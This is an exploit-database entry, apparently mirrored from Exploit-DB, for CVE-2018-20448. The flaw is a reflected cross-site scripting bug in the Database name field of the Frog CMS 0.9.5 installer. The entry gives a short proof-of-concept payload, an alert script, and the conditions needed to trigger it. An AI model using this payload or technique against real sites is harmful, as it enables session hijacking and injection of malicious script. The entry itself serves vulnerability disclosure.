[] NeoSense
E X P L O I T S
title author type platform port cve id

Frog CMS 0.9.5 - Cross-Site Scripting

Author: WangDudu
type: webapps
platform: php
port: 80.0
date_added: 2019-01-02 
date_updated: 2019-01-02 
verified: 0 
codes: CVE-2018-20448 
tags: Cross-Site Scripting (XSS)
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt46500/50157270-f915f480-030b-11e9-8d21-7617feb127af.png 
application_url: http://www.exploit-db.comFrogCMS-master.zip
# Exploit Title: Frog CMS 0.9.5 - Cross-Site Scripting
# Date: 2018-12-25
# Exploit Author:WangDudu
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Software Link: https://github.com/philippe/FrogCMS
# Version:0.9.5
# CVE :CVE-2018-20448

# The parameter under /install/index.php is that the Database name has reflective XSS
# 1 The Database name , username and password must be correct
# 2 You can use the exp:

<script>alert(1)</script>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.